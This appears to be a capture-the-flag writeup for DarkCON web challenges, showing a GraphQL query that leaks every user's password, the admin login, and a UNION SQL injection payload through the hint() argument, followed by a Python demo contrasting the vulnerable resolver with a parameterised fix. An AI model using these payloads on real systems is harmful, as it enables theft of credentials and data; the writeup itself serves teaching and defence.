web hacking

DarkCON CTF web Writeup - DarkCON Challs

as3617 2021. 2. 21. 21:49
1. graphql injection
2. union sql injection

Get the admin password: the GraphQL schema exposes the password field through allUsers.

{
    allUsers{
        username
        password
    }
}

login - admin:is_this_visible_to_you?


{
    Challs{
        id
        title
        description
        category
        author
        points
        flag{
            chall_flag
        }
    }
}

Get the flag using SQL injection: the chall_id argument of hint() is concatenated into the query, so a UNION SELECT from the flags table works (/**/ replaces spaces).

{
    hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#"){
        chall_id
    }
}
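The root cause of the second step is the hint resolver building its SQL from the GraphQL argument as a string. The following is an added example, not code from the challenge or from this writeup: it models a hint resolver backed by SQLite (the challenge's real backend, table layout and column names are unknown, so the schema below is an assumption), runs a UNION payload adapted from the one above against the vulnerable version, and shows the hardened version that validates chall_id as an integer and binds it as a parameter. The trailing comment is written as `--` because SQLite does not treat `#` as a comment the way MySQL does.

```python
import sqlite3

# Constructed in-memory schema approximating the challenge's tables (assumption):
# hints(chall_id, hint, author) and flags(chall_id, chall_flag).
SCHEMA = """
CREATE TABLE hints (chall_id INTEGER, hint TEXT, author TEXT);
CREATE TABLE flags (chall_id INTEGER, chall_flag TEXT);
INSERT INTO hints VALUES (1, 'look at the graphql schema', 'as3617');
INSERT INTO flags VALUES (1, 'darkCON{constructed_sample_flag}');
"""

# UNION payload in the style of the writeup, adapted to SQLite comment syntax.
PAYLOAD = "-1/**/union/**/select/**/group_concat(chall_flag),2,3/**/from/**/flags--"


def new_db():
    """Create a fresh in-memory database with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def hint_vulnerable(conn, chall_id: str):
    """Resolver as the challenge presumably had it: the GraphQL argument is
    interpolated straight into the SQL text, so the UNION becomes part of the query."""
    sql = f"SELECT chall_id, hint, author FROM hints WHERE chall_id={chall_id}"
    return conn.execute(sql).fetchall()


def hint_safe(conn, chall_id: str):
    """Hardened resolver: reject anything that is not an integer, then bind the
    value as a parameter so it can never be parsed as SQL."""
    try:
        cid = int(chall_id)
    except ValueError:
        raise ValueError("chall_id must be an integer")
    sql = "SELECT chall_id, hint, author FROM hints WHERE chall_id=?"
    return conn.execute(sql, (cid,)).fetchall()


if __name__ == "__main__":
    conn = new_db()
    print("vulnerable:", hint_vulnerable(conn, PAYLOAD))  # flag row comes back
    print("safe, id 1:", hint_safe(conn, "1"))
    try:
        hint_safe(conn, PAYLOAD)
    except ValueError as e:
        print("safe, payload:", e)
```

Even with parameter binding, the first step of the writeup (reading every user's password through allUsers) is a schema problem rather than a query problem: the fix there is not to expose a password field in the GraphQL type at all, and to disable introspection and require authentication on user listing.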